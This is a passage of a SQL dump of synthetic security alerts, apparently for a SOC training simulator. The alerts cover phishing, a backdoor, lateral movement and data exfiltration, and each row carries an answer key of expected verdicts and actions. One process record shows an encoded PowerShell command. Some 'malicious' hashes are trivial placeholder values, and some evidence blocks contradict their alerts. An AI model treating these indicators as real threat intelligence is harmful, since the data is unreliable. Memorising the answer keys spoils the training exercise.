activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Volt Typhoon.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential exfiltration of sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain linked to malicious exfiltration activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.051Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:24:00Z\\\",\\\"event_id\\\":\\\"EXP-2023-10-15-0001\\\",\\\"source_ip\\\":\\\"10.0.0.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"encryption_protocol\\\":\\\"TLSv1.3\\\",\\\"destination_port\\\":443,\\\"data_size\\\":\\\"5GB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"process\\\":\\\"exfiltrator.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\",\\\"external_domain\\\":\\\"malicious-exfiltration.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(443, 'Phishing Email Detected', 'medium', 'Email Security Gateway', 'A phishing email was detected posing as an interview request. The email was sent from a known malicious IP address linked to Charming Kitten APT group, attempting to entice the target to engage.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:55:32Z\",\"email_id\":\"785e6a2f-1b7a-4f3c-bd8f-5d8f560f1f83\",\"from\":\"hr@fakecompany.com\",\"to\":\"targetuser@victimcompany.com\",\"subject\":\"Interview Request\",\"attacker_ip\":\"185.92.26.82\",\"recipient_ip\":\"192.168.1.15\",\"malicious_link\":\"http://malicious-link.com/interview\",\"attachment_name\":\"Interview_Schedule.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.82\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Charming Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/interview\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used for credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash of a known phishing document.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:19.052Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(444, 'Malicious WhatsApp Message', 'medium', 'Mobile Device Management', 'A WhatsApp message was sent to a user containing a link to a fake interview form designed to harvest credentials. The message appears to be part of a social engineering attack aimed at gaining initial access to the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"device_id\":\"MDM-12345\",\"user\":\"jane.doe@example.com\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"message_id\":\"msg-7890\",\"whatsapp_message\":{\"sender\":\"+15551234567\",\"recipient\":\"+15559876543\",\"message_content\":\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"attachment_filename\":\"Interview_Form.pdf\"},\"indicators\":[{\"type\":\"url\",\"value\":\"http://malicious-link.com/form\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\"}]}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com/form\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for phishing and credential harvesting.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with credential harvesting.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:19.053Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:00Z\\\",\\\"device_id\\\":\\\"MDM-12345\\\",\\\"user\\\":\\\"jane.doe@example.com\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"message_id\\\":\\\"msg-7890\\\",\\\"whatsapp_message\\\":{\\\"sender\\\":\\\"+15551234567\\\",\\\"recipient\\\":\\\"+15559876543\\\",\\\"message_content\\\":\\\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\\\",\\\"attachment_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attachment_filename\\\":\\\"Interview_Form.pdf\\\"},\\\"indicators\\\":[{\\\"type\\\":\\\"url\\\",\\\"value\\\":\\\"http://malicious-link.com/form\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"},{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(445, 'DownPaper Backdoor Execution', 'high', 'Endpoint Detection and Response', 'The DownPaper backdoor has been executed on the victim\'s device following credential harvesting. This backdoor is used to maintain unauthorized access to the system.', 'Malware Execution', 'T1059.001: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"123456\",\"device\":\"WORKSTATION-01\",\"user\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"hash\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"event_type\":\"process_creation\",\"process_command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"description\":\"Execution of DownPaper backdoor detected\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DownPaper backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"downpaper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Filename associated with DownPaper malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(446, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With established access, the attacker uses the backdoor to move laterally within the network, seeking valuable data.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:45:27Z\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"malicious_ip\":\"203.0.113.45\",\"protocol\":\"RDP\",\"username\":\"admin_user\",\"file_name\":\"malware_backdoor.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"network_connection_attempt\",\"event_description\":\"RDP connection attempt detected from internal IP to another internal host using known malicious credentials.\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of target host.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_behavior_analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual login patterns detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malware_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus_scan\",\"verdict\":\"malicious\",\"details\":\"File identified as a backdoor used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(447, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention System', 'Finally, the attacker attempts to exfiltrate sensitive information, completing their objective of data theft.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:33:47Z\",\"event_type\":\"data_exfiltration_attempt\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"protocol\":\"FTP\",\"action\":\"blocked\",\"detection_method\":\"Data Loss Prevention System\",\"description\":\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\"}', '2026-01-04 23:59:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"File hash not found in known malicious file databases\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:47Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"detection_method\\\":\\\"Data Loss Prevention System\\\",\\\"description\\\":\\\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.056Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 